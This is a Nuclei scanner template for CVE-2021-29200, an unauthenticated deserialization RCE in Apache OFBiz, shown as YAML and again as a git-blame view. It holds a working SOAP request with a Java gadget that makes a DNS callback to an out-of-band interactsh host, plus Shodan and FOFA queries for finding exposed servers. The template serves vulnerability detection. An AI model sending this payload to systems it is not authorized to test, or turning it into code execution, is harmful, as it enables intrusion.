nuclei-templates/http/cves/2021/CVE-2021-29200.yaml

id: CVE-2021-29200

info:
  name: Apache OFBiz < 17.12.07 - Arbitrary Code Execution
  author: your3cho
  severity: critical
  description: |
    Apache OFBiz has unsafe deserialization prior to 17.12.07 version An unauthenticated user can perform an RCE attack
  reference:
    - http://www.openwall.com/lists/oss-security/2021/04/27/4
    - https://nvd.nist.gov/vuln/detail/CVE-2021-29200
    - https://github.com/freeide/CVE-2021-29200
    - https://lists.apache.org/thread.html/r108a964764b8bd21ebd32ccd4f51c183ee80a251c105b849154a8e9d%40%3Ccommits.ofbiz.apache.org%3E
    - https://lists.apache.org/thread.html/r708351f1a8af7adb887cc3d8a92bed8fcbff4a9e495e69a9ee546fda%40%3Cnotifications.ofbiz.apache.org%3E
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-29200
    cwe-id: CWE-502
    epss-score: 0.85578
    epss-percentile: 0.9855
    cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: apache
    product: ofbiz
    shodan-query:
      - html:"OFBiz"
      - http.html:"ofbiz"
      - ofbiz.visitor=
    fofa-query:
      - app="Apache_OFBiz"
      - body="ofbiz"
      - app="apache_ofbiz"
  tags: cve2021,cve,apache,ofbiz,deserialization,rce

http:
  - raw:
      - |
        POST /webtools/control/SOAPService HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/xml

        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
          <soapenv:Header/>
            <soapenv:Body>
              <ser>
                <map-HashMap>
                  <map-Entry>
                    <map-Key>
                      <cus-obj>{{generate_java_gadget("dns", "http://{{interactsh-url}}", "hex")}}</cus-obj>
                    </map-Key>
                    <map-Value>
                      <std-String value="STDSTRING"/>
                    </map-Value>
                  </map-Entry>
                </map-HashMap>
             </ser>
          </soapenv:Body>
        </soapenv:Envelope>

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: word
        part: body
        words:
          - 'value="responseMessage"'
# digest: 4a0a004730450221009e0295e0c024bb1aaca80a8d18779019589dce1bb14a770440d2159d4d9dd8500220688c7dc355595b0d0401e4863626125828d0bbce8fe1ce46c1d7499d1ef86960:922c64590222798bb761d5b6d8e72950
Create CVE-2021-29200.yaml 2023-12-15 12:18:56 +00:00			`id: CVE-2021-29200`

			`info:`
			`name: Apache OFBiz < 17.12.07 - Arbitrary Code Execution`
			`author: your3cho`
			`severity: critical`
			`description: \|`
metadata added 2023-12-19 01:54:17 +00:00			`Apache OFBiz has unsafe deserialization prior to 17.12.07 version An unauthenticated user can perform an RCE attack`
Create CVE-2021-29200.yaml 2023-12-15 12:18:56 +00:00			`reference:`
			`- http://www.openwall.com/lists/oss-security/2021/04/27/4`
			`- https://nvd.nist.gov/vuln/detail/CVE-2021-29200`
			`- https://github.com/freeide/CVE-2021-29200`
TemplateMan Update [Sun Jan 14 13:49:26 UTC 2024] :robot: 2024-01-14 13:49:27 +00:00			`- https://lists.apache.org/thread.html/r108a964764b8bd21ebd32ccd4f51c183ee80a251c105b849154a8e9d%40%3Ccommits.ofbiz.apache.org%3E`
			`- https://lists.apache.org/thread.html/r708351f1a8af7adb887cc3d8a92bed8fcbff4a9e495e69a9ee546fda%40%3Cnotifications.ofbiz.apache.org%3E`
metadata added 2023-12-19 01:54:17 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
			`cvss-score: 9.8`
TemplateMan Update [Sun Jan 14 13:49:26 UTC 2024] :robot: 2024-01-14 13:49:27 +00:00			`cve-id: CVE-2021-29200`
metadata added 2023-12-19 01:54:17 +00:00			`cwe-id: CWE-502`
product/queries updated 2024-05-31 19:23:20 +00:00			`epss-score: 0.85578`
			`epss-percentile: 0.9855`
metadata added 2023-12-19 01:54:17 +00:00			`cpe: cpe:2.3:a:apache:ofbiz::::::::`
Create CVE-2021-29200.yaml 2023-12-15 12:18:56 +00:00			`metadata:`
			`max-request: 1`
			`vendor: apache`
			`product: ofbiz`
TemplateMan Update [Fri Jun 7 10:04:28 UTC 2024] :robot: 2024-06-07 10:04:29 +00:00			`shodan-query:`
			`- html:"OFBiz"`
			`- http.html:"ofbiz"`
			`- ofbiz.visitor=`
			`fofa-query:`
			`- app="Apache_OFBiz"`
			`- body="ofbiz"`
			`- app="apache_ofbiz"`
auto tagging via templateman 2024-01-14 09:21:50 +00:00			`tags: cve2021,cve,apache,ofbiz,deserialization,rce`
Create CVE-2021-29200.yaml 2023-12-15 12:18:56 +00:00
			`http:`
			`- raw:`
			`- \|`
			`POST /webtools/control/SOAPService HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/xml`

			`<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">`
			`<soapenv:Header/>`
			`<soapenv:Body>`
			`<ser>`
			`<map-HashMap>`
			`<map-Entry>`
			`<map-Key>`
			`<cus-obj>{{generate_java_gadget("dns", "http://{{interactsh-url}}", "hex")}}</cus-obj>`
			`</map-Key>`
			`<map-Value>`
			`<std-String value="STDSTRING"/>`
			`</map-Value>`
			`</map-Entry>`
			`</map-HashMap>`
			`</ser>`
			`</soapenv:Body>`
			`</soapenv:Envelope>`

			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: interactsh_protocol`
			`words:`
			`- "dns"`

			`- type: word`
			`part: body`
			`words:`
			`- 'value="responseMessage"'`
Auto Template Signing [Sat Jun 8 16:02:16 UTC 2024] :robot: 2024-06-08 16:02:17 +00:00			`# digest: 4a0a004730450221009e0295e0c024bb1aaca80a8d18779019589dce1bb14a770440d2159d4d9dd8500220688c7dc355595b0d0401e4863626125828d0bbce8fe1ce46c1d7499d1ef86960:922c64590222798bb761d5b6d8e72950`